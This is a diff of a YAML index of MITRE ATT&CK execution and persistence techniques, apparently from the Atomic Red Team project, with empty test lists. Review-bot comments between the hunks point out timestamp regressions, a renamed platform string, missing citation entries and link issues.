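Review bot: two content points in this hunk beyond the reordering. First, T1559 loses x_mitre_permissions_required (Administrator, User, SYSTEM) with no replacement; that field was retired in the 3.x attack spec, but any filter in the project that keys on it should be checked. Second, the new T1059.011 object is named just 'Lua' and has no `identifier:` line, whereas the sibling sub-techniques above use the 'Command and Scripting Interpreter: PowerShell' / 'Command and Scripting Interpreter: Bash' form and carry `identifier: T1059.001` and `identifier: T1059.004`; if name and identifier are taken straight from upstream that is acceptable, but it should be consistent within the file. Its `x_mitre_detection: ''` is empty, so there is no detection guidance to build on for this entry yet.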
@@ -26505,7 +26884,7 @@ execution:
url: https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation
description: Team Nautilus. (2021, June). Attacks in the Wild on the Container
Supply Chain and Infrastructure. Retrieved August 26, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-26T16:42:35.318Z'
name: 'User Execution: Malicious Image'
description: |-
Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
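Review bot: the `modified` timestamp for T1204.003 goes backwards, from 2022-04-25 to 2021-08-26. A refresh from a newer ATT&CK release should never move this field earlier, so either this object was taken from an older bundle or the value was derived from something other than the STIX `modified` field; please check which upstream version the index was generated from before merging.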
@@ -26532,30 +26911,12 @@ execution:
- 'Instance: Instance Creation'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1204.003
atomic_tests: []
T1203:
technique:
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
- created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.4'
- external_references:
- - source_name: mitre-attack
- external_id: T1203
- url: https://attack.mitre.org/techniques/T1203
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:34:23.908Z'
+ name: Exploitation for Client Execution
description: |-
Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
@@ -26572,9 +26933,10 @@ execution:
### Common Third-party Applications
Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Exploitation for Client Execution
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Detecting software exploitation may be difficult depending
on the tools available. Also look for behavior on the endpoint system that
might indicate successful compromise, such as abnormal behavior of the browser
@@ -26582,21 +26944,37 @@ execution:
evidence of [Process Injection](https://attack.mitre.org/techniques/T1055)
for attempts to hide execution, evidence of Discovery, or other unusual network
traffic that may indicate additional tools transferred to the system.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
+ - 'File: File Modification'
- 'Application Log: Application Log Content'
+ - 'Network Traffic: Network Traffic Flow'
+ x_mitre_remote_support: false
x_mitre_system_requirements:
- Remote exploitation for execution requires a remotely accessible service reachable
over the network or other vector of access such as spearphishing or drive-by
compromise.
- x_mitre_remote_support: false
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
+ created: '2018-04-18T17:59:24.739Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1203
+ external_id: T1203
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.006:
technique:
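Review bot: T1203's x_mitre_data_sources gains 'File: File Modification' and 'Network Traffic: Network Traffic Flow' while x_mitre_version is re-emitted unchanged at '1.4'. An upstream content change without a version bump is possible but unusual, so confirm the additions come from the bundle rather than from a merge of two object versions. The x_mitre_detection text above still only describes browser misbehaviour, process injection and unusual network traffic, so if the new data sources are correct they also mark where local detection notes for this entry could be extended.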
@@ -26646,28 +27024,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.006
atomic_tests: []
T1569:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
- type: attack-pattern
- created: '2020-03-10T18:23:06.482Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1569
- url: https://attack.mitre.org/techniques/T1569
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-20T19:55:40.527Z'
name: System Services
description: Adversaries may abuse system services or daemons to execute commands
or programs. Adversaries can execute malicious content by interacting with
@@ -26678,32 +27039,44 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for command line invocations of tools capable of
modifying services that doesn’t correspond to normal usage patterns and known
software, patch cycles, etc. Also monitor for changes to executables and other
files associated with services. Changes to Windows services may also be reflected
in the Registry.
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'Process: Process Creation'
- 'Service: Service Creation'
- 'File: File Modification'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- - root
x_mitre_remote_support: true
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
+ created: '2020-03-10T18:23:06.482Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1569
+ external_id: T1569
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1059.003:
technique:
- modified: '2024-03-01T17:35:02.889Z'
+ modified: '2024-10-15T15:19:56.540Z'
name: 'Command and Scripting Interpreter: Windows Command Shell'
description: |-
Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
@@ -26746,12 +27119,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.003
atomic_tests: []
T1651:
technique:
- modified: '2024-04-12T03:27:48.171Z'
+ modified: '2024-10-15T13:42:42.543Z'
name: Cloud Administration Command
description: |-
Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)
@@ -26808,11 +27180,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:43:27.104Z'
name: 'Command and Scripting Interpreter: Visual Basic'
description: |-
Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
@@ -26877,14 +27248,13 @@ execution:
url: https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.005
atomic_tests: []
T1648:
technique:
- modified: '2024-03-05T16:13:38.643Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Serverless Execution
description: "Adversaries may abuse serverless computing, integration, and automation
services to execute arbitrary code in cloud environments. Many cloud providers
@@ -26905,14 +27275,19 @@ execution:
an adversary may create a Lambda function that automatically adds [Additional
Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user
and a corresponding CloudWatch events rule that invokes that function whenever
- a new user is created.(Citation: Backdooring an AWS account) Similarly, an
- adversary may create a Power Automate workflow in Office 365 environments
- that forwards all emails a user receives or creates anonymous sharing links
- whenever a user is granted access to a document in SharePoint.(Citation: Varonis
- Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)"
+ a new user is created.(Citation: Backdooring an AWS account) This is also
+ possible in many cloud-based office application suites. For example, in Microsoft
+ 365 environments, an adversary may create a Power Automate workflow that forwards
+ all emails a user receives or creates anonymous sharing links whenever a user
+ is granted access to a document in SharePoint.(Citation: Varonis Power Automate
+ Data Exfiltration)(Citation: Microsoft DART Case Report 001) In Google Workspace
+ environments, they may instead create an Apps Script that exfiltrates a user's
+ data when they open a file.(Citation: Cloud Hack Tricks GWS Apps Script)(Citation:
+ OWN-CERT Google App Script 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Shailesh Tiwary (Indian Army)
- Praetorian
@@ -26921,16 +27296,18 @@ execution:
- Varonis Threat Labs
- Alex Soler, AttackIQ
- Vectra AI
+ - OWN
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
- 'Application Log: Application Log Content'
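Review bot: the platform for T1648 is renamed from 'Office 365' to 'Office Suite'. Any consumer that selects techniques by the literal platform string (per-platform index files, test filters, dashboards) will silently stop matching this technique unless it is updated for the new name; worth calling out in the PR description and grepping the repository for the old string.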
@@ -26956,6 +27333,14 @@ execution:
description: Eric Saraga. (2022, February 2). Using Power Automate for Covert
Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.
url: https://www.varonis.com/blog/power-automate-data-exfiltration
+ - source_name: Cloud Hack Tricks GWS Apps Script
+ description: HackTricks Cloud. (n.d.). GWS - App Scripts. Retrieved July 1,
+ 2024.
+ url: https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts
+ - source_name: OWN-CERT Google App Script 2024
+ description: L'Hutereau Arnaud. (n.d.). Google Workspace Malicious App Script
+ analysis. Retrieved October 2, 2024.
+ url: https://www.own.security/ressources/blog/google-workspace-malicious-app-script-analysis
- source_name: Cado Security Denonia
description: 'Matt Muir. (2022, April 6). Cado Discovers Denonia: The First
Malware Specifically Targeting Lambda. Retrieved May 27, 2022.'
@@ -26970,29 +27355,10 @@ execution:
url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1204.001:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
- type: attack-pattern
- created: '2020-03-11T14:43:31.706Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1204.001
- url: https://attack.mitre.org/techniques/T1204/001
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-10T16:40:03.786Z'
name: Malicious Link
description: An adversary may rely upon a user clicking a malicious link in
order to gain execution. Users may be subjected to social engineering to get
@@ -27005,25 +27371,41 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: |-
Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.
Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Creation'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
+ created: '2020-03-11T14:43:31.706Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1204/001
+ external_id: T1204.001
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1569.002:
technique:
- modified: '2023-08-14T15:53:00.999Z'
+ modified: '2024-10-15T16:41:40.247Z'
name: 'System Services: Service Execution'
description: |-
Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe
) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe
and [Net](https://attack.mitre.org/software/S0039).
@@ -27073,17 +27455,16 @@ execution:
url: https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1569.002
atomic_tests: []
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
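Review bot: the sentence added to the T1053.002 description introduces `(Citation: Malicious Life by Cybereason)`, which only resolves if an `external_references` entry with `source_name: Malicious Life by Cybereason` is emitted in the same object; confirm the reference is added together with this text. Separately, `spec_version: '2.1'` is dropped from this object and nothing replaces it; if any consumer of this file reads that STIX field, the removal belongs in the change description.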
@@ -27146,7 +27527,7 @@ execution:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -27180,8 +27561,8 @@ execution:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -27190,6 +27571,10 @@ execution:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
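Review bot: the new `Malicious Life by Cybereason` reference URL ends in `#blog-subscribe`, a fragment that scrolls to the newsletter sign-up block rather than the article body; drop the fragment so the link lands on the cited content: `url: https://www.cybereason.com/blog/wmi-lateral-movement-win32`.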
@@ -27202,29 +27587,29 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests: []
persistence:
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
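Review bot: the rewritten T1053.005 description no longer carries the statement that the deprecated `at` utility (ex: [At](https://attack.mitre.org/techniques/T1053/002)) cannot access tasks created with `schtasks` or the Control Panel; if this text is mirrored verbatim from upstream ATT&CK that is expected, otherwise confirm the omission is intended. Minor: the added text spells the product `Powershell`, while elsewhere in this file it is `PowerShell`.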
@@ -27271,7 +27656,7 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -27303,8 +27688,8 @@ persistence:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -27318,6 +27703,10 @@ persistence:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
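Review bot: the new `Red Canary - Atomic Red Team` reference links to `blob/master/atomics/T1053.005/T1053.005.md`, this repository's own technique page on a moving branch, so the cited content can change underneath the citation; a commit- or tag-pinned permalink would make the `Retrieved June 19, 2024` claim reproducible.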
@@ -27330,16 +27719,19 @@ persistence:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
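Review bot: the `modified` timestamp for T1205.002 moves backwards, from `2022-11-08T14:00:00.188Z` to `2022-10-20T19:56:18.579Z`; a regressing modification time usually means the file was regenerated from a different upstream snapshot rather than updated in place, so check that the source dataset is the intended ATT&CK release and that this object is not being downgraded.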
@@ -27402,7 +27794,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037:
technique:
@@ -27467,49 +27858,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
